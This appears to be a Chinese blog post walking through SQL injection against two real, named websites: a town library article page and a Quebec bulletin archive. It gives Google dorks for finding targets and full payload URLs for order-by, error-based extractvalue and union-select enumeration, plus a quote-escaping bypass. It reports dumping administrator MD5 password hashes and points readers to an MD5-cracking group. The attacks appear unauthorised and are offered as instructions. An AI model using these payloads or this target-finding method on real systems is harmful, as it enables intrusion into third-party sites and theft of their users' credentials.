sql注入实战

可以利用google的“inurl:”语法来找到一些url含参数的网站

示例:inurl:about.php?cartId=

分享一个Google搜素词典


sql注入实战_第1张图片

可以用 or 1=1 和 and 1=2 来测是网站是否含有SQL注入漏洞

实例

网站 http://www.edgartownlibrary.org/article.php?id=41


sql注入实战_第2张图片
wowo

主要是介绍图书馆的文章

http://www.edgartownlibrary.org/article.php?id=41‘ 网页直接报错



order by 确定字段数

http://www.edgartownlibrary.org/article.php?id=41%20order%20by%204%23

确定字段数为4

爆数据库

尝试了联合注入 但是报错 于是采用报错注入

http://www.edgartownlibrary.org/article.php?id=41%20or%20extractvalue(1,concat(%27~%27,(select%20group_concat(database())),%27-%27))


依次爆出其特数据即可

第二个网站

网址:


存在注入漏洞

order by 确定字段数

http://strategiessl.qc.ca/bulletin/archive.php?id=274%20order%20by%206%23

确定字段数为6

联合注入爆数据库

http://strategiessl.qc.ca/bulletin/archive.php?id=274%20union%20select%201,database(),3,4,5,6%20%23


接下来是关键

爆数据表

http://strategiessl.qc.ca/bulletin/archive.php?id=274%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema=%27strate_infolettre%27%23


单引号被转义

在sql-labs中我们知道可以用 宽字节注入 来吃掉‘ \ ’,宽字节注入依靠的是中文gbk编码,但是此网站是加拿大的 所以没有采用gbk编码 宽字节注入也就失效了

由于单引号的问题 无法继续爆数据表;

这里我尝试了多次  乱写的代码竟然绕过了(手动滑稽)

代码:id=274%20union%20select%201,group_concat(column_name),3,4,5,6%20from%20information_schema.columns%20where%20table_name=(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)

爆出的数据展示


sql注入实战_第3张图片

这里管理员的密码采取了MD5加密  而MD5加密具有不可逆性 所以只能依靠随机碰撞来猜测密码 10位以内的密码有很高的概率可以解开 但我没有到可以解密的工具 顺便给大家推荐个MD5解密群,希望可以帮到大家。

sql注入实战_第4张图片

你可能感兴趣的:(sql注入实战)